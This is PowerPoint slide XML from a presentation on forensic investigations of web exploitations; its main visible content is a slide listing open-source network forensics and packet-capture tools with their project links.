              <a:defRPr sz="1000" b="1" baseline="0"/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presenter Name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presenter Title</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Presenter Company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568621" y="1532554"/>
            <a:ext cx="5486400" cy="31363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Master Title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4857750"/>
            <a:ext cx="395942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B9AB1BC5-8244-4997-9202-6D7E7DEA20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B9AB1BC5-8244-4997-9202-6D7E7DEA20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386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566928" y="1492792"/>
            <a:ext cx="8001000" cy="31363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Master Title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4857750"/>
            <a:ext cx="395942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B9AB1BC5-8244-4997-9202-6D7E7DEA20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1/2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566928" y="1492792"/>
            <a:ext cx="3886200" cy="31363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Master Title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4857750"/>
            <a:ext cx="395942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B9AB1BC5-8244-4997-9202-6D7E7DEA20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reverse 2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3082950" y="1492792"/>
            <a:ext cx="5486400" cy="31363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Master Title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4857750"/>
            <a:ext cx="395942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B9AB1BC5-8244-4997-9202-6D7E7DEA20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928" y="2038350"/>
            <a:ext cx="80010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1200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Master Title</a:t>
            </a:r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4857750"/>
            <a:ext cx="395942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B9AB1BC5-8244-4997-9202-6D7E7DEA20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928" y="1492792"/>
            <a:ext cx="3886200" cy="313639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728" y="1492792"/>
            <a:ext cx="3886200" cy="313639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Master Title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4857750"/>
            <a:ext cx="395942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B9AB1BC5-8244-4997-9202-6D7E7DEA20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Master Title</a:t>
            </a:r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4857750"/>
            <a:ext cx="395942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B9AB1BC5-8244-4997-9202-6D7E7DEA20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382000" y="4857750"/>
            <a:ext cx="395941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B9AB1BC5-8244-4997-9202-6D7E7DEA20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6928" y="929725"/>
            <a:ext cx="8001000" cy="3385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928" y="1497398"/>
            <a:ext cx="8001000" cy="31317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" y="111305"/>
            <a:ext cx="5486400" cy="33855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Master Title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71" r:id="rId3"/>
    <p:sldLayoutId id="2147483650" r:id="rId4"/>
    <p:sldLayoutId id="2147483664" r:id="rId5"/>
    <p:sldLayoutId id="2147483668" r:id="rId6"/>
    <p:sldLayoutId id="2147483651" r:id="rId7"/>
    <p:sldLayoutId id="2147483652" r:id="rId8"/>
    <p:sldLayoutId id="2147483654" r:id="rId9"/>
    <p:sldLayoutId id="2147483655" r:id="rId10"/>
    <p:sldLayoutId id="2147483656" r:id="rId11"/>
    <p:sldLayoutId id="2147483669" r:id="rId12"/>
    <p:sldLayoutId id="2147483670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rgbClr val="004989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ts val="1000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:defRPr sz="16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1pPr>
      <a:lvl2pPr marL="457200" indent="-225425" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="16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2pPr>
      <a:lvl3pPr marL="688975" indent="-231775" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="▫"/>
        <a:defRPr sz="16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spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="·"/>
        <a:defRPr sz="12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4pPr>
      <a:lvl5pPr marL="1146175" indent="-231775" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
        <a:buChar char="-"/>
        <a:defRPr sz="12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chaosreader.sourceforge.net/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tcpdump.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.enderunix.org/voipong/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.net.ohio-state.edu/softwar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omit.xtdnet.nl/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.xplico.org/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tcpxtract.sourceforge.net/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ucsniff.sourceforge.net/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ethereal.com/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://networkminer.sourceforge.net/" TargetMode="External"/><Relationship Id="rId1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ettercap.sourceforge.net/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tcptrace.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sourceforge.net/projects/aimsniff" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.jpeg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tcpick.sourceforge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reshmeat.net/projects/ssldump/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.kismetwireless.net/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tcpreplay.sourceforge.net/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/netik/tcpdstat" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.circlemud.org/~jelson/software/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.wireshark.org/" TargetMode="External"/><Relationship Id="rId1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herpeg.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sourceforge.net/projects/data-echo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://www.forensicfocus.com/open-source-network-forensics-appliance-howto" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://freshmeat.net/projects/driftnet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mailto:krehel@lifars.co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50"/>
            <a:ext cx="7772400" cy="897682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Forensic Investigations of Web Exploitations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2647950"/>
            <a:ext cx="5791200" cy="304800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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400" dirty="0" smtClean="0"/>
              <a:t>Ondrej Krehel, CISSP, CEH, Lifars LLC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1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09550"/>
            <a:ext cx="4919661" cy="86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T:\Work\Lifars doc\Company docs\Pic for Word do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181350"/>
            <a:ext cx="6019800" cy="1675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66928" y="819150"/>
            <a:ext cx="5486400" cy="3810034"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Review ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.net.ohio-state.edu/software/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Tcpdump ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.tcpdump.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Ethereal ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.ethereal.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Tcpextract ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://tcpxtract.sourceforge.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Vomit ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://vomit.xtdnet.nl/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Voipong ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://www.enderunix.org/voipong/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>Chaosreader ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>http://chaosreader.sourceforge.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sk-SK" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>NetworkMiner (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>http://networkminer.sourceforge.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr lang="sk-SK" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>UCSniff (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>http://ucsniff.sourceforge.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> ) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Xplico (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>http://www.xplico.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
          </a:p>
          <a:p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Open Source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B9AB1BC5-8244-4997-9202-6D7E7DEA20B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 descr="chaosreader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715000" y="895350"/>
            <a:ext cx="2713085" cy="542617"/>
          </a:xfrm>
          <a:prstGeom prst="rect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7" name="Picture 6" descr="ettercap_forum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248400" y="1733550"/>
            <a:ext cx="1883870" cy="574284"/>
          </a:xfrm>
          <a:prstGeom prst="rect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4578" name="AutoShape 2" descr="data:image/jpeg;base64,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